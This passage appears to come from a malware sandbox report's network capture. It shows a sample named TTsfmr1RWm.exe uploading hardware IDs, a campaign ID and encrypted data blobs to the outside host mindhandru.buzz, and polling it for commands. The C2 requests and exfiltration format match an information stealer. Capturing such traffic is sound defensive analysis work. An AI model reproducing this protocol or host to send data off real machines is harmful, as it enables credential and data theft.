2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 2d 2d 30 54 58 4c 43 46 48 51 42 54 30 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 32 38 41 33 37 33 34 39 42 31 44 46 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 54 58 4c 43 46 48 51 42 54 30 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 54 58 4c 43 46 48 51 42 54 30 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 54 58 4c 43 46 48 51 Data Ascii: --0TXLCFHQBT0TContent-Disposition: form-data; name="hwid"4C28A37349B1DFB7BEBA0C6A975F1733--0TXLCFHQBT0TContent-Disposition: form-data; name="pid"1--0TXLCFHQBT0TContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0TXLCFHQ
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 96 2c d0 ac 95 e6 26 64 ad cc 62 e0 fd 24 81 a2 cf 5c 8b 3d 04 77 7c 10 74 f0 c9 1e 2a 7c ef 31 61 fa cb f7 eb df 1a 18 a0 3c 5b d3 65 75 db 49 84 4d 1e d0 13 9d fd 39 d4 62 87 c0 b3 eb b2 cd e6 c6 b2 66 44 20 ba 0c 2c 2e b3 da 5f 68 b0 15 c1 c6 22 8a 25 fb 2f e8 80 91 5e 73 83 35 67 59 87 4c 7d 0f 14 eb 6b bb cc 25 c0 30 d9 07 36 06 7e 31 46 4f a2 f8 69 be fe 88 8b 9a a9 44 49 e8 fb 8e b9 09 8f d6 44 cd bd fa df ca cc 93 44 60 ca 13 42 e6 37 4b 06 f3 e3 b6 28 c8 eb 03 ea 50 ab f2 8c a6 05 82 a2 f8 eb 9a 47 95 58 8e 8b a3 4d 5e 84 5e 26 6b 1b 56 58 12 a8 44 84 7d 02 19 be 6b 7d 25 d7 00 63 a0 3a 41 f2 30 ac ad f1 2d 4a 9e 55 8b 22 1c 5e 70 94 47 5f 7c e7 d8 2a db 9b 33 83 9e a5 c5 41 e3 1f c8 0c ee af 05 c6 7e 66 db f7 04 c3 51 42 a7 5b 31 f4 55 38 c7 d3 Data Ascii: ,&db$\=w\|t\|1a<[euIM9bfD ,._h"%/^s5gYL}k%06~1FOiDIDD`B7K(PGXM^^&kVXD}k}%c:A0-JU"^pG_\|3A~fQB[1U8
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 7d a1 1b 98 de fd e9 62 7b 69 f9 4f d0 ea 52 d0 ec 2d 4a 2a 5e e6 00 2a 6c 62 36 ab 3e 41 83 5e 67 58 c1 ef dc b4 62 60 ae a9 27 5c 25 db 7e 3b 3b f6 e3 eb 21 d1 59 37 0c d0 d1 eb 18 12 4c 1f 0d 53 04 e4 f1 0d 68 0a e2 43 1b 23 4f e7 13 e2 a9 be b8 ef 8a 99 e4 4b 21 5d 10 62 96 10 3c 00 64 ba 3f 6c 66 7f d8 1e 19 4e 04 e5 79 c0 c2 b9 5a 83 26 ed bd dc d7 9c 1f 15 44 94 78 e3 dc d1 26 54 7c d3 b0 74 ab f1 2f 7d 99 f1 ab e7 b5 91 59 aa 58 fd 3a f7 fc 4e 35 f4 7f 34 fb be 7b 35 6f 09 05 48 22 b7 c8 df 88 16 bc 61 d1 2e 11 42 52 3c e4 70 4a 26 47 13 78 d4 46 23 02 5c bb bf f5 35 e7 23 85 42 49 1d 7a b7 8b ac e1 ea 2a 78 e2 b2 c6 08 80 6a 98 2e b3 8d 96 66 2e ce 95 44 bc c7 c9 5b 36 03 3d 52 b7 ad ad 73 e6 de 62 77 60 e9 49 92 b0 85 1c 5a a4 27 14 69 b3 91 4c Data Ascii: }b{iOR-J^lb6>A^gXb`'\%~;;!Y7LShC#OK!]b<d?lfNyZ&Dx&T\|t/}YX:N54{5oH"a.BR<pJ&GxF#\5#BIz*xj.f.D[6=Rsbw`IZ'iL
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: f8 b3 da f9 e4 f7 02 0a 48 88 52 ad 4c e0 e7 14 a3 40 0d 96 39 db 1a 11 fb 8d e1 25 fb 9f 97 eb 02 59 9a 83 e5 2c ce 9b d4 85 6e 93 60 cf f5 9f f5 9b 79 04 09 be 12 23 d4 45 7e be 57 77 10 1c 3c 81 01 78 c5 70 56 ee d1 4c 35 fc 81 c1 4a f7 3a b6 b8 08 6b 44 8c 69 df f0 af c5 a1 dc 1a 64 f2 9b b7 c6 1d 7c f1 11 ed 4d 82 0b 7d 61 2a bf e9 7f 5b 8c 44 40 b1 c8 df ed 02 ba a0 43 6c 33 de 82 a9 6d 02 a6 02 8e 93 b2 80 0e 8a 6b bd 05 78 49 f1 bd 77 c0 5c 50 c0 e3 7a 9f f5 0f 37 11 de b5 5b 45 b9 d9 56 10 9b 19 91 38 0a 5a 22 2b 2f 83 fc 46 ae 63 09 9d 66 ae 1e 13 29 8d 9d d0 9d 36 06 7b 80 c5 6e 14 f7 02 d1 5e 29 12 b9 a7 e8 a1 5c 64 e0 2b fc 83 e7 38 18 73 b7 46 23 5e 65 04 59 0c 03 ad 7f 6c 40 76 86 b8 4d a0 d0 c9 26 90 91 3b 3e 25 30 3d bc a5 64 13 18 f6 33 Data Ascii: HRL@9%Y,n`y#E~Ww<xpVL5J:kDid\|M}a*[D@Cl3mkxIw\Pz7[EV8Z"+/Fcf)6{n^)\d+8sF#^eYl@vM&;>%0=d3
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 02 52 a4 65 b5 a5 65 55 a9 0a 83 30 ba f1 0b 45 8a 09 3b 94 c0 e8 92 3e 6a d8 e0 b4 8f 96 69 0c bc 3b d1 ae 14 63 35 7b 32 ec f6 87 c4 c8 4e 1a 35 80 1a 14 07 ac 10 37 e5 57 05 23 d5 05 c3 c6 35 94 e4 09 c0 4a cd 3c fa ba 18 9e 4d b7 b4 88 34 6b de 8c fa 2d d1 90 ad dd b6 7e 74 d5 4d 18 ee 78 1b a3 6d a1 ac 44 0b 98 3f 11 4d 49 5d cc 7a 6e d5 a2 8f f6 dc 3c 43 9e ef 5c 4e 16 d1 1e 69 8e d7 5b a9 fb 66 85 99 5f 13 d5 c4 65 6e d1 69 93 cf f1 ae 4d 68 7c 6f d3 90 d5 6c de 3d a5 10 bf f6 56 b7 a5 2e a6 e6 d3 87 b8 bc 40 b6 44 c7 1e 50 b4 cf d9 19 6f 39 26 00 81 01 b8 6b 35 7e 27 8e e4 cf 38 14 d0 df 13 fa cb c4 bc ff 73 1a 2a 37 ae 49 9c 63 59 87 0a 61 3b 95 b1 3f 34 e3 cc ba 77 9b c2 a8 e1 30 66 d7 bf de af 9e 71 41 fe e6 ea a4 14 7e 45 58 f2 ac e4 c9 ed 8f Data Ascii: ReeU0E;>ji;c5{2N57W#5J<M4k-~tMxmD?MI]zn<C\Ni[f_eniMh\|ol=V.@DPo9&k5~'8s*7IcYa;?4w0fqA~EX
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 38 ab 9f 04 7c db da 06 a6 5c 25 c9 cf f3 82 42 6e 6a ff 80 c8 da 84 54 23 1e ab c0 e9 c4 21 1e 4e 08 03 09 94 1f bf 00 b4 d9 cd 1c 00 80 fc e9 b5 f2 16 82 24 80 f8 de 1b 7e 72 de 82 c5 83 d3 11 a8 b0 5a 00 1b a3 41 81 23 5e c7 cf b8 8c c7 72 af 1d e4 e5 04 dc fb 04 f2 9e 21 35 63 13 fa 9d a8 37 07 c0 c7 4c 0d a0 f7 94 25 15 cb 96 0c ab 35 77 22 5f 62 7f da f1 f8 07 e7 fb e3 98 e4 e2 c3 20 5b bd 46 16 5d b2 40 36 eb 0b be 80 2f 90 79 ba 60 8d 06 de 4b 08 8b 9b 61 b4 8b c6 8d 11 cf bb a4 54 50 82 ea f4 a1 e9 22 61 22 2f ce da 2a 9e 17 c9 b4 18 ae e1 74 19 1f ce ad 7b 16 b1 64 a9 29 c2 15 c7 d5 f0 c5 2c a9 09 9c f3 52 24 90 09 dd e1 83 ab c8 f9 d3 ce 34 3d 91 82 0b d3 c6 6b 49 29 7f a4 ee ad 61 4a c7 e8 19 b3 c5 12 91 f2 45 bb 75 80 0c 12 c3 ce 09 99 56 14 Data Ascii: 8\|\%BnjT#!N$~rZA#^r!5c7L%5w"_b [F]@6/y`KaTP"a"/*t{d),R$4=kI)aJEuV
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 4b d6 4c 95 0f 10 13 7c f2 97 02 bc a1 a8 00 17 62 c8 53 8b bc 67 3b cc c9 bd 4a 49 21 24 32 64 12 7f be 31 6b ec 23 64 83 06 b8 02 2c 0f 00 c5 68 eb 01 37 61 cc 0b 35 94 b5 c6 a7 06 15 3c c2 f8 c9 dd 80 24 b2 24 eb 35 e0 21 4b 83 a6 e3 ff ad 24 5e 50 5c 14 5d be b4 86 b5 c1 79 65 88 3a 78 ac 16 8b 92 cb d7 c5 11 93 76 44 39 89 dd 27 ce 77 36 78 77 4b 4e b3 2c ef 3e 7c 0c e3 17 5f b7 f6 6f 22 28 aa 20 ee 24 ac 0e 50 bd 56 20 a6 b8 3e 7a 76 f5 c3 41 52 2e 34 b2 2e 7d 6b 54 ef cb b1 43 02 78 cb 82 51 82 9d da 9d 5c de 83 4d f4 c0 b7 07 68 da 85 95 7b a6 44 1a aa b1 87 33 46 c9 ca cd c8 55 e8 e3 73 72 84 16 47 7a e9 9a 8f f5 18 87 f7 60 f6 05 77 23 9a e6 b2 03 84 37 e1 e8 c2 2d 1b be 98 27 f7 d6 e6 a8 f3 79 f2 f3 4b 2d 1a 6e a8 d9 1e 08 b7 f6 a9 61 eb bb 5b Data Ascii: KL\|bSg;JI!$2d1k#d,h7a5<$$5!K$^P\]ye:xvD9'w6xwKN,>\|_o"( $PV >zvAR.4.}kTCxQ\Mh{D3FUsrGz`w#7-'yK-na[
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: ec 95 8c 87 5c 59 04 1c e2 ce 92 1f ef f7 2b dc ec 37 c2 cf 0e 8e 2d 0f ae 12 f7 b0 dc 7d f3 7f 19 9e f8 c2 f8 c6 75 a8 65 8c ef 98 75 b9 9d b8 f9 b9 bc e3 da 0f 6a d5 c2 0a 61 ee ba 00 b1 e8 a6 36 bb b7 a6 63 6b b9 a9 d7 50 87 57 86 7a 8e 55 70 95 8f 66 68 87 5a 1c 93 84 32 b7 ec d6 7c 0f 6c 86 40 9a fc 36 a6 8d ec 6a c6 18 71 e0 91 d1 cf 52 91 e4 9b 19 4b b4 83 b7 e6 76 58 94 70 43 64 88 b6 6b a9 8a 43 18 e9 35 a9 8c e5 83 7f e7 d3 28 d4 5b 4a 22 73 9b de 2c 0e 43 e3 07 f1 57 c6 57 97 8d f1 5b 97 56 e0 a5 06 41 e0 c7 43 d4 71 4f f9 af 29 c7 a1 6c b5 b5 05 3f 79 61 0e ba 8a c7 e3 31 fb 51 a9 7e 67 f3 38 39 03 2b 9a 89 27 55 0e 3d 33 b0 78 16 79 4e e5 f6 c9 bd 22 65 57 ec fb f7 ba 57 0f d8 7c 02 fe 00 67 8a 1c 25 9c 88 f9 24 03 92 c3 61 7d 15 20 be 76 ec Data Ascii: \Y+7-}ueuja6ckPWzUpfhZ2\|l@6jqRKvXpCdkC5([J"s,CWW[VACqO)l?ya1Q~g89+'U=3xyN"eWW\|g%$a} v
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: f2 17 06 fe 6c 11 33 bd f8 c0 92 61 8c d4 c6 7a 57 40 51 ad 60 47 fc ba 71 11 73 7d f8 2c 77 fd e4 ba ff d7 ec 92 f9 c9 0b ac 62 02 b5 3c af ac 26 2e 14 65 27 d0 21 a7 29 a0 78 bd ce d7 4c f8 c1 58 f6 be 3a 48 f3 5f d8 e5 13 92 d6 1d a3 51 f0 e7 59 98 5f b9 28 fd bf 90 34 2b 0a 5e 54 f8 06 01 f2 7e ba cb 1e 0e 1d bf 34 a6 f5 d3 c3 69 29 68 cc 85 a1 9a 53 e2 e8 76 d9 36 ff 7b 29 72 12 bf 87 37 b1 62 66 db cf 93 3e e4 a5 8b 6f ec 0b 9c d6 c3 2e e3 55 9b 70 7e ea 1d b7 be b7 0f ec 23 74 fe 9f 51 1c 9a 1c 23 0c 4f 39 24 05 8b e2 0a 23 40 cd 68 07 6e e7 5a 48 03 2c 7b 86 48 10 0e 78 f6 13 2c 7f 27 40 40 7e aa 41 3c 87 23 00 63 55 d0 40 64 f5 0e ca 52 a1 ea 10 32 97 9f 74 02 4e f3 5f 79 fa a1 8b 8a 36 4e 69 64 99 af 61 72 30 9d 61 0a c3 15 b7 40 4e 23 34 61 42 Data Ascii: l3azW@Q`Gqs},wb<&.e'!)xLX:H_QY_(4+^T~4i)hSv6{)r7bf>o.Up~#tQ#O9$#@hnZH,{Hx,'@@~A<#cU@dR2tN_y6Nidar0a@N#4aB
2024-12-26 11:41:31 UTC	15331	OUT	Data Raw: 31 3d 18 77 6d 31 eb bd 2b 34 b1 2b eb f6 b7 e6 47 03 e6 e9 06 cc 4d 85 e4 24 4f da 0f 6f 94 6e e6 cc 3f 46 df 6a 37 e7 56 aa 75 b8 fa 64 a4 9c 3a f3 9a af bb de 03 f3 48 6f f7 71 a3 b9 bc e5 e1 97 fe f3 ab c6 af 0f f6 9a 7c f7 ba 87 cc 29 d9 7a 00 b0 62 72 fd 81 5f 62 9f db 14 8d 49 44 af 94 cf 2f 6c de f5 ed 9b 0d 5d 9a 7a ed e5 33 28 c1 cc 8d 61 be 79 82 bc 21 82 a9 58 3b d4 1f aa 90 b5 f2 92 55 de eb 6a ea 55 5e 77 dd a6 e8 75 e1 f1 33 27 2f 7b b7 e1 43 9f 7b 48 29 5e 43 1e 33 74 fd 90 72 e2 69 db e7 f0 cd ce 2b 7d b3 02 0b 2f 7f 64 f1 93 b5 8a c2 be 08 6a 72 77 91 22 9d e0 ef 3f 1c ee 47 dc 52 e8 36 8b 54 48 08 9f 24 ec 99 40 1e fa e6 a6 79 f7 44 7c 6c 6c 47 48 68 e1 d5 4e d1 27 96 70 ba aa 59 95 9c 74 20 6e 37 37 a6 40 af e8 a3 ba e6 85 19 83 22 0c Data Ascii: 1=wm1+4+GM$Oon?Fj7Vud:Hoq\|)zbr_bID/l]z3(ay!X;UjU^wu3'/{C{H)^C3tri+}/djrw"?GR6TH$@yD\|llGHhN'pYt n77@"
2024-12-26 11:41:35 UTC	1135	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vsjv9b13uoof1rnvt7br55ll8l; expires=Mon, 21 Apr 2025 05:28:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4BX2IFHazdJNLANrRZsF7e5%2FJ6r%2Bd4kxSTwsQeQrjkhxoD%2FtW8UrZfyYsaO1%2BlQ9Io2CkPr3rVoDMzxL3zKsVdVaxrXdfU39twdQ95KBjWYw4eKa0BhPs95QBi%2FWWgbPI7I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd63f8ef5e5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1570&rtt_var=604&sent=361&recv=612&lost=0&retrans=0&sent_bytes=2836&recv_bytes=590355&delivery_rate=1790312&cwnd=251&unsent_bytes=0&cid=ef0d14bfec05c673&ts=3872&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49776	20.198.119.84	443

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:36 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 47 6a 50 62 47 71 4c 51 30 30 71 33 61 2f 77 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 36 65 61 34 39 33 32 61 62 31 61 36 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: GjPbGqLQ00q3a/wd.1Context: 3b6ea4932ab1a61
2024-12-26 11:41:36 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-26 11:41:36 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 47 6a 50 62 47 71 4c 51 30 30 71 33 61 2f 77 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 36 65 61 34 39 33 32 61 62 31 61 36 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 46 55 57 56 70 7a 72 4f 35 39 6c 55 66 64 71 50 31 70 6f 6d 34 50 6a 38 37 44 61 47 49 6a 49 53 62 4e 68 46 6a 6a 76 41 31 6b 70 5a 4c 45 52 71 77 50 46 36 56 31 58 65 55 30 6f 5a 78 79 37 66 34 32 68 2f 35 69 59 38 79 70 42 38 44 37 64 75 2f 55 64 36 48 30 69 37 67 49 6a 34 55 77 59 72 6d 61 52 6b 46 2f 65 70 43 38 52 78 38 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: GjPbGqLQ00q3a/wd.2Context: 3b6ea4932ab1a61<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVFUWVpzrO59lUfdqP1pom4Pj87DaGIjISbNhFjjvA1kpZLERqwPF6V1XeU0oZxy7f42h/5iY8ypB8D7du/Ud6H0i7gIj4UwYrmaRkF/epC8Rx8
2024-12-26 11:41:36 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 47 6a 50 62 47 71 4c 51 30 30 71 33 61 2f 77 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 36 65 61 34 39 33 32 61 62 31 61 36 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: GjPbGqLQ00q3a/wd.3Context: 3b6ea4932ab1a61<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-26 11:41:37 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-26 11:41:37 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 62 52 7a 35 6f 62 68 73 66 55 4b 4c 4b 73 76 6b 32 72 31 48 33 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: bRz5obhsfUKLKsvk2r1H3g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49777	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:37 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: mindhandru.buzz
2024-12-26 11:41:37 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 34 43 32 38 41 33 37 33 34 39 42 31 44 46 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=4C28A37349B1DFB7BEBA0C6A975F1733
2024-12-26 11:41:37 UTC	1120	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b82nshlq87217mnpl901j7h8rd; expires=Mon, 21 Apr 2025 05:28:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tFLKletDZqFnbuDBWJeTlGqymAhrvNsF4fETMeooKH%2B3j5T0YQejWPHNDOY%2FURqq8B9V4Na9XBiHaXPwrM9njS7ELf9g3ACKR5y5ATj14bV6UAHM2bP95eJGd8TvTyit6HQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd850806f02d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1790&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1576673&cwnd=77&unsent_bytes=0&cid=0eff9b7aa9920083&ts=772&x=0"
2024-12-26 11:41:37 UTC	210	IN	Data Raw: 63 63 0d 0a 33 58 4c 52 39 47 73 34 43 57 67 43 52 45 38 36 68 57 44 2b 48 47 4e 50 6e 77 37 67 34 38 4b 44 39 4b 34 73 32 45 4f 52 64 73 53 47 43 66 4f 42 53 51 49 72 41 48 59 77 50 77 44 5a 54 36 49 7a 55 6e 65 71 49 4e 4c 53 39 36 33 46 6e 78 2f 32 63 71 63 71 36 37 49 55 74 36 68 45 58 47 77 4f 4c 43 45 33 58 36 64 4d 33 48 6f 58 62 61 55 2b 7a 4d 47 6e 6f 63 36 66 55 66 51 34 73 77 50 6d 35 31 43 35 67 42 39 49 4d 7a 51 74 47 47 41 4c 76 56 58 51 4c 6c 4a 36 73 54 2f 52 30 4f 79 79 77 76 49 44 74 79 58 33 4b 75 75 35 46 37 66 61 44 6b 42 73 53 69 35 6d 4b 55 36 6e 57 73 34 77 51 53 71 39 4e 4e 43 65 6e 77 3d 3d 0d 0a Data Ascii: cc3XLR9Gs4CWgCRE86hWD+HGNPnw7g48KD9K4s2EORdsSGCfOBSQIrAHYwPwDZT6IzUneqINLS963Fnx/2cqcq67IUt6hEXGwOLCE3X6dM3HoXbaU+zMGnoc6fUfQ4swPm51C5gB9IMzQtGGALvVXQLlJ6sT/R0OyywvIDtyX3Kuu5F7faDkBsSi5mKU6nWs4wQSq9NNCenw==
2024-12-26 11:41:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.6	49838	20.198.119.84	443

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:58 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 53 46 30 56 73 70 6c 4f 6b 43 41 34 6a 31 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 32 32 62 62 61 37 37 62 38 62 34 66 66 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: tSF0VsplOkCA4j1x.1Context: c722bba77b8b4ffd
2024-12-26 11:41:58 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-26 11:41:58 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 74 53 46 30 56 73 70 6c 4f 6b 43 41 34 6a 31 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 32 32 62 62 61 37 37 62 38 62 34 66 66 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 46 55 57 56 70 7a 72 4f 35 39 6c 55 66 64 71 50 31 70 6f 6d 34 50 6a 38 37 44 61 47 49 6a 49 53 62 4e 68 46 6a 6a 76 41 31 6b 70 5a 4c 45 52 71 77 50 46 36 56 31 58 65 55 30 6f 5a 78 79 37 66 34 32 68 2f 35 69 59 38 79 70 42 38 44 37 64 75 2f 55 64 36 48 30 69 37 67 49 6a 34 55 77 59 72 6d 61 52 6b 46 2f 65 70 43 38 52 78 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: tSF0VsplOkCA4j1x.2Context: 